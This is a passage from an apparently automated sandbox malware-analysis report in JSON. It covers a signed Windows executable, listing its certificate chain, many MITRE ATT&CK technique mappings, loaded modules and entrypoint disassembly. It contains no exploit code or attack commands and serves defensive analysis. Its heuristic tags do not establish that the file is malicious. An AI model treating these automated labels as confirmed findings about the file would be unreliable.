"DD:FB:16:CD:49:31:C9:73:A2:03:7D:3F:C8:3A:4D:7D:77:5D:05:E4", "valid_from": "2013-08-01T12:00:00+00:00", "valid_until": "2038-01-15T12:00:00+00:00"}, {"owner": "CN=DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA, O=\"DigiCert, Inc.\", C=US", "issuer": "CN=DigiCert Trusted Root G4, OU=www.digicert.com, O=DigiCert Inc, C=US", "serial_number": "73637b724547cd847acfd28662a5e5b", "md5": "9E:3E:4F:A4:41:17:44:1D:BA:73:C2:8E:98:3F:C0:5F", "sha1": "B6:C8:AF:83:4D:4E:53:B6:73:C7:68:72:AA:8C:95:0C:7C:54:DF:5F", "valid_from": "2022-03-23T00:00:00+00:00", "valid_until": "2037-03-22T23:59:59+00:00"}, {"owner": "CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O=\"DigiCert, Inc.\", C=US", "issuer": "CN=DigiCert Trusted Root G4, OU=www.digicert.com, O=DigiCert Inc, C=US", "serial_number": "8ad40b260d29c4c9f5ecda9bd93aed9", "md5": "D9:12:99:E8:43:55:CD:8D:5A:86:79:5A:01:18:B6:E9", "sha1": "7B:0F:36:0B:77:5F:76:C9:4A:12:CA:48:44:5A:A2:D2:A8:75:70:1C", "valid_from": "2021-04-29T00:00:00+00:00", "valid_until": "2036-04-28T23:59:59+00:00"}, {"owner": "CN=DigiCert Timestamp 2022 - 2, O=DigiCert, C=US", "issuer": "CN=DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA, O=\"DigiCert, Inc.\", C=US", "serial_number": "c4d69724b94fa3c2a4a3d2907803d5a", "md5": "C1:B3:49:87:18:80:F9:35:9E:1E:24:16:30:31:3D:E9", "sha1": "F3:87:22:4D:86:33:82:92:35:A9:94:BC:BD:8F:96:E9:FE:1C:7C:73", "valid_from": "2022-09-21T00:00:00+00:00", "valid_until": "2033-11-21T23:59:59+00:00"}, {"owner": "CN=Valve Corp., O=Valve Corp., L=Bellevue, ST=Washington, C=US", "issuer": "CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O=\"DigiCert, Inc.\", C=US", "serial_number": "689b3bceb4409890a32d71976b132a4", "md5": "83:89:6E:CC:20:DB:9E:84:A1:A1:D6:D5:B5:B1:5A:5D", "sha1": "93:57:67:D6:6F:AD:4A:D2:D1:F0:3A:09:5C:49:37:0D:C7:4D:F6:07", "valid_from": "2021-10-07T00:00:00+00:00", "valid_until": "2024-10-09T23:59:59+00:00"}], "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 1, "total_signatures": 140, "file_metadata": {"file_compositions": [], "imported_objects": [], "file_analysis": [], "total_file_compositions_imports": null}, "processes": [{"uid": "00000000-00005000", "name": "2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe", "normalized_path": "C:\\2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe", "sha256": "2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Code Signing", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002", "informative_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 3}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Internal Defacement", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Defacement", "attck_id": "T1491", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491"}}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 756A0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "certificate-0", "type": 17, "relevance": 10, "name": "The input sample is signed with a certificate", "description": "The input sample is signed with a certificate issued by \"CN=DigiCert Assured ID Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US\" (SHA1: A9:9D:5B:79:E9:F1:CD:A5:9C:DA:B6:37:31:69:D5:35:3F:58:74:C6; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert Trusted Root G4, OU=www.digicert.com, O=DigiCert Inc, C=US\" (SHA1: DD:FB:16:CD:49:31:C9:73:A2:03:7D:3F:C8:3A:4D:7D:77:5D:05:E4; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert Trusted Root G4, OU=www.digicert.com, O=DigiCert Inc, C=US\" (SHA1: B6:C8:AF:83:4D:4E:53:B6:73:C7:68:72:AA:8C:95:0C:7C:54:DF:5F; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert Trusted Root G4, OU=www.digicert.com, O=DigiCert Inc, C=US\" (SHA1: 7B:0F:36:0B:77:5F:76:C9:4A:12:CA:48:44:5A:A2:D2:A8:75:70:1C; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA, O=\"DigiCert\n Inc.\", C=US\" (SHA1: F3:87:22:4D:86:33:82:92:35:A9:94:BC:BD:8F:96:E9:FE:1C:7C:73; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O=\"DigiCert\n Inc.\", C=US\" (SHA1: 93:57:67:D6:6F:AD:4A:D2:D1:F0:3A:09:5C:49:37:0D:C7:4D:F6:07; see report for more information)", "origin": "Certificate Data", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d\" file has an entrypoint instructions - \"call\t0x844842,jmp\t0x843994,cmp\tecx, dword ptr [0xc614c4],jne\t0x843b23,ret\t,jmp\t0x843fa7,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,cmp\tdword ptr [0xceddc4], 6,jl\t0x843b40,vcvttss2usi\teax, xmm0,ret\t,movd\teax, xmm0,shl\teax, 1,jb\t0x843b63,cmp\teax, 0x9e000000,jae\t0x843b54,cvttss2si\teax, xmm0,ret\t,cmp\teax, 0x9f000000,jae\t0x843b6a,shl\teax, 7,bts\teax, 0x1f,ret\t,cmp\teax, 0x7f000000,jb\t0x843b4f,cvttss2si\tecx, dword ptr [0xc24580],cmc\t,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"KERNEL32\" at base 776a0000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ce0000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"WINHTTP.DLL\" at base 71c10000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"MSVCRT.DLL\" at base 77410000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"SHLWAPI.DLL\" at base 76170000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"KERNEL32.DLL\" at base 776a0000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"ADVAPI32.DLL\" at base 77360000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"WS2_32.DLL\" at base 774c0000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"SSPICLI.DLL\" at base 75a10000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"CRYPTSP.DLL\" at base 75590000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"RPCRT4.DLL\" at base 76220000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"CREDSSP.DLL\" at base 75250000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75550000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"WSHTCPIP\" at base 750b0000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"WSHIP6.DLL\" at base 75540000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHQOS.DLL\" at base 73de0000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"DNSAPI.DLL\" at base 75410000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 750b0000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 75540000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"IPHLPAPI.DLL\" at base 73ee0000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"RASADHLP.DLL\" at base 6e6d0000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73e10000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCHANNEL.DLL\" at base 75390000\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"CRYPT32.DLL\" at base 75d50000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005000)\n 